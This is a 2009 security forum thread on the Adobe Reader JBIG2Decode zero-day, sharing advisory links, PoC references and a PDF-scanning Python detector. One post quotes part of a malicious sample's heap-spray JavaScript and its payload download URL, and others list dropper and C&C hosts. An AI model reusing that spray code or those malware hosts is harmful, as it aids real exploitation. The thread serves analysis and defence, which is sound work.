Malware Domain List

Malware Related => Tools of the trade / Internet News => Topic started by: SysAdMini on February 20, 2009, 07:06:26 am

Title: Adobe/Acrobat 0-day
Post by: SysAdMini on February 20, 2009, 07:06:26 am
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20090219
Title: Re: Adobe/Acrobat 0-day
Post by: Serg on February 20, 2009, 12:14:55 pm
hxxp://dump.vicp.cc/l/a.bin - URL from the same 0day, I suppose...
Title: Re: Adobe/Acrobat 0-day
Post by: Serg on February 20, 2009, 01:37:22 pm
cnc on religion.xicp.net and religion.8866.org? Japan? WTF ???
Title: Re: Adobe/Acrobat 0-day
Post by: SysAdMini on February 21, 2009, 05:21:58 am
http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html
Title: Re: Adobe/Acrobat 0-day
Post by: SysAdMini on February 22, 2009, 06:28:20 pm
Homebrew patch for Adobe AcroReader 9
http://vrt-sourcefire.blogspot.com/2009/02/homebrew-patch-for-adobe-acroreader-9.html
Title: Re: Adobe/Acrobat 0-day
Post by: DiFor on February 22, 2009, 06:38:44 pm
And has anybody seen a working version of this? Very interesting to see.
Title: Re: Adobe/Acrobat 0-day
Post by: SysAdMini on February 24, 2009, 06:55:40 am
Targeted PDFs Used as Exploits
https://forums.symantec.com/t5/blogs/blogarticlepage/blog-id/vulnerabilities_exploits/article-id/188
Title: Re: Adobe/Acrobat 0-day
Post by: WIEx on February 24, 2009, 07:22:16 am
milw0rm POCs:
http://milw0rm.com/exploits/8090
http://milw0rm.com/exploits/8099

I think that attacks will soon follow as well, now that the POC is public.
Title: Re: Adobe/Acrobat 0-day
Post by: alta on February 24, 2009, 09:04:55 am
Thanks WIEx for the lynks  ;)
Title: Re: Adobe/Acrobat 0-day
Post by: DiFor on February 24, 2009, 12:20:03 pm
it's a DoS exploit
Title: Re: Adobe/Acrobat 0-day
Post by: Serg on February 24, 2009, 01:27:53 pm
but it works under 9 ;)
Title: Re: Adobe/Acrobat 0-day
Post by: DiFor on February 24, 2009, 02:17:51 pm
it only crashes the application)
Title: Re: Adobe/Acrobat 0-day
Post by: Serg on February 24, 2009, 02:27:39 pm
the new payload for me... pdf md5: 8AE719CDD29F0E6AF4D4DD321CC40355

Code:
...
                while (pointers.length<=0x100000/2)pointers+=pointers
                pointers=pointers.substring(0,0x100000/2-32/2-4/2-pointers1.length-2/2)
                while (nop.length<=0x100000/2)nop+=nop
                nop=nop.substring(0,0x100000/2-32/2-4/2-jmp.length-2/2)
                var x=new Array()
                for (i=0 ; i<150 ; i++)
                {
                        x[i]=nop+shellcode
                }
                for ( ; i<201 ; i++)
                {
                        x[i]=pointers+pointers1
                }
                return x
...
(http://img10.imageshack.us/img10/5553/pdfjs.jpg)
load from
Code:
http://202.67.215.110/caonimabi.exe
The IP is well known from several malware samples, e.g.: http://www.threatexpert.com/report.aspx?md5=39376f28624e3de9e23d6fd57235b42e
Title: Re: Adobe/Acrobat 0-day
Post by: Serg on February 24, 2009, 02:30:00 pm
Quote
it only crashes the application)
u do not know the secret   :D
Title: Re: Adobe/Acrobat 0-day
Post by: WIEx on February 24, 2009, 02:33:00 pm
Quote
it only crashes the application)

Yes, I said that this is a POC (proof of concept) exploit
Title: Re: Adobe/Acrobat 0-day
Post by: WIEx on February 24, 2009, 02:38:17 pm
Serg, thx, good work:)
Title: Re: Adobe/Acrobat 0-day
Post by: Serg on February 24, 2009, 04:17:48 pm
Quote
Serg, thx, good work:)
Ur welcome)
WIEx r u from opensc.ws?  :-\ and r ur icq 274734*?
Title: Re: Adobe/Acrobat 0-day
Post by: WIEx on February 24, 2009, 04:56:05 pm
Quote
WIEx r u from opensc.ws?
No, Only as a spectator)

Quote
and r ur icq 274734*?
no:)
Title: Re: Adobe/Acrobat 0-day
Post by: SysAdMini on February 25, 2009, 07:04:27 am
Adobe Acrobat pdf 0-day exploit, No JavaScript needed
https://isc.sans.org/diary.html?storyid=5926

http://secunia.com/blog/44/
Title: Re: Adobe/Acrobat 0-day
Post by: Serg on February 25, 2009, 08:03:34 am
tested on malware
(http://img301.imageshack.us/img301/1882/pdfexpl.jpg)
payload doesn't start but reader crashed => exp works, no js needed... shit...
Title: Re: Adobe/Acrobat 0-day
Post by: Serg on February 25, 2009, 10:14:38 am
Adobe Reader and Acrobat Issue update
http://blogs.adobe.com/psirt/

Quote
Adobe is also planning to make updates available for Adobe Reader 7 and 8, and Acrobat 7 and 8, by March 18th. :o

Quote
1. Launch Acrobat or Adobe Reader.
2. Select Edit>Preferences
3. Select the JavaScript Category
4. Uncheck the Enable Acrobat JavaScript option :o
5. Click OK

I hate adobe. 1 month without solution... >:(
Title: Re: Adobe/Acrobat 0-day
Post by: WIEx on February 25, 2009, 01:38:10 pm
upload this file here
Title: Re: Adobe/Acrobat 0-day
Post by: dash_neghab on February 26, 2009, 01:42:40 pm
Could we have this file for analysis also? At least entire javascript code....
Title: Re: Adobe/Acrobat 0-day
Post by: Serg on February 26, 2009, 02:46:46 pm
Quote
Could we have this file for analysis also? At least entire javascript code....
No :-*
Title: Re: Adobe/Acrobat 0-day
Post by: SysAdMini on March 04, 2009, 06:36:12 pm
Didier Stevens describes how to get infected through this PDF vulnerability WITHOUT opening the PDF file !!!!

Quickpost: /JBIG2Decode Trigger Trio
http://blog.didierstevens.com/2009/03/04/quickpost-jbig2decode-trigger-trio/
Title: Re: Adobe/Acrobat 0-day
Post by: kenrry on March 09, 2009, 02:59:51 am
Quote
Could we have this file for analysis also? At least entire javascript code....
No :-*
Maybe the JavaScript code is not important; the JavaScript only makes a heap spray with an address, but from the info on the net I can't find the exploit address, so I think the head of the JBIG2Decode stream is very important.
Also, in Windows, if the mouse moves over the PDF file, AcroRd32Info.exe will open it without using Reader.
add me with icq 94507815 and get more info
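The heap-spray loop quoted from the sample earlier in the thread and the /JBIG2Decode stream that kenrry points to are both things a defender can look for statically before a file ever reaches Reader. The triage script below is an added example written for this thread; it is not code from the thread, from the malware sample, or from any of the linked write-ups. The PDF-like sample bytes it scans are constructed inline for the demonstration and are not a real exploit, and the indicator names, the loop pattern and the 0x10000-or-larger size threshold are my own choices. The script resolves #xx escapes inside PDF name tokens (so an obfuscated filter name such as /JB#49G2Decode is still recognised as /JBIG2Decode), inflates Flate-compressed streams, and reports which indicators it found.

```python
import re
import zlib

# Constructed sample document (not a real exploit): a PDF-like byte string
# with a hex-escaped /JBIG2Decode filter name, an /OpenAction pointing at a
# JavaScript action, and a Flate-compressed /JS stream whose body contains a
# heap-spray-style doubling loop similar to the one quoted in the thread.
_SPRAY_JS = (b"var nop=unescape('%u9090%u9090');"
             b"while(nop.length<=0x100000/2)nop+=nop;")
_JS_STREAM = zlib.compress(_SPRAY_JS)
SAMPLE_PDF = b"".join([
    b"%PDF-1.4\n",
    b"1 0 obj << /Type /Catalog /OpenAction 3 0 R >> endobj\n",
    b"2 0 obj << /Filter /JB#49G2Decode /Length 3 >> stream\n",
    b"\xff\xff\xff\nendstream endobj\n",
    b"3 0 obj << /S /JavaScript /JS 4 0 R >> endobj\n",
    b"4 0 obj << /Filter /FlateDecode /Length "
    + str(len(_JS_STREAM)).encode() + b" >> stream\n",
    _JS_STREAM, b"\nendstream endobj\n",
    b"%%EOF\n",
])

# A benign constructed document with no streams, actions or JavaScript.
BENIGN_PDF = b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n%%EOF\n"

NAME_RE = re.compile(rb"/([A-Za-z0-9#]+)")          # PDF name tokens
HEX_ESC_RE = re.compile(rb"#([0-9A-Fa-f]{2})")      # #xx escape inside a name
STREAM_RE = re.compile(rb"(?<!end)stream\r?\n(.*?)endstream", re.DOTALL)
# Doubling loop that grows a string up to a large hex bound (heap-spray idiom).
SPRAY_LOOP_RE = re.compile(rb"while\s*\(\s*\w+\.length\s*<=?\s*0x[0-9A-Fa-f]{5,}")


def normalize_names(data: bytes) -> bytes:
    """Resolve #xx escapes in name tokens (/JB#49G2Decode -> /JBIG2Decode)."""
    def fix(m):
        return b"/" + HEX_ESC_RE.sub(lambda h: bytes([int(h.group(1), 16)]), m.group(1))
    return NAME_RE.sub(fix, data)


def stream_bodies(data: bytes):
    """Yield each stream body, inflated when it is valid zlib/Flate data, raw otherwise."""
    for m in STREAM_RE.finditer(data):
        body = m.group(1)
        try:
            # decompressobj tolerates the trailing newline before 'endstream'.
            yield zlib.decompressobj().decompress(body)
        except zlib.error:
            yield body


def scan_pdf(data: bytes) -> list:
    """Return a sorted list of indicator names found in the document bytes."""
    findings = set()
    names = normalize_names(data)
    if b"/JBIG2Decode" in names:
        findings.add("jbig2decode_filter")
        if b"/JBIG2Decode" not in data:
            findings.add("obfuscated_filter_name")
    if b"/OpenAction" in names:
        findings.add("openaction")
    if b"/JavaScript" in names or re.search(rb"/JS\b", names):
        findings.add("javascript")
    # Check inflated stream bodies plus the raw file for uncompressed scripts.
    for body in list(stream_bodies(data)) + [data]:
        if SPRAY_LOOP_RE.search(body):
            findings.add("heap_spray_loop")
        if b"unescape(" in body and re.search(rb"%u[0-9A-Fa-f]{4}", body):
            findings.add("unicode_escaped_bytes")
    return sorted(findings)


def is_suspicious(data: bytes) -> bool:
    """JBIG2Decode alone is a legitimate filter; flag it only alongside script or spray indicators."""
    found = set(scan_pdf(data))
    return "jbig2decode_filter" in found and bool(
        found & {"javascript", "heap_spray_loop", "obfuscated_filter_name"})


if __name__ == "__main__":
    for label, doc in (("sample", SAMPLE_PDF), ("benign", BENIGN_PDF)):
        print(label, is_suspicious(doc), scan_pdf(doc))
```

Run it against a directory of PDFs by reading each file as bytes and calling scan_pdf; the point of checking the normalized names rather than the raw bytes is that a plain grep for /JBIG2Decode misses the escaped form, while a filter name that is escaped at all is itself worth a second look.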
Title: Re: Adobe/Acrobat 0-day
Post by: dash_neghab on March 13, 2009, 07:58:36 am
Thanks for PoC :-)  :-*
Title: Re: Adobe/Acrobat 0-day
Post by: DiFor on March 13, 2009, 03:25:52 pm
Tell me please, how can I insert the exploit JS source or shellcode into it (to execute, for example)?
Title: Re: Adobe/Acrobat 0-day
Post by: dash_neghab on March 14, 2009, 07:01:38 am
Ask Serg about it
Title: Re: Adobe/Acrobat 0-day
Post by: sowhat-x on March 14, 2009, 02:47:24 pm
He-he,I really hate "replying in place" of others,but well...I think Serg already gave his answer regarding this issue...  ::)
Title: Re: Adobe/Acrobat 0-day
Post by: Serg on March 15, 2009, 02:30:18 pm
Quote
He-he,I really hate "replying in place" of others,but well...I think Serg already gave his answer regarding this issue...  ::)
Thank u  sowhat-x! :) I  can't reply "NO" to all script kiddies around the world...
Title: Re: Adobe/Acrobat 0-day
Post by: SysAdMini on March 25, 2009, 09:43:06 am
Adobe Reader and Acrobat JBIG2 Encoded Stream Heap Overflow Vulnerability
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=776
Title: Re: Adobe/Acrobat 0-day
Post by: Toaster on March 27, 2009, 09:15:16 pm
btw I forgot..
my Analysis of the PDF Exploit

http://web17.webbpro.de/index.php?page=analysing-the-pdf-exploit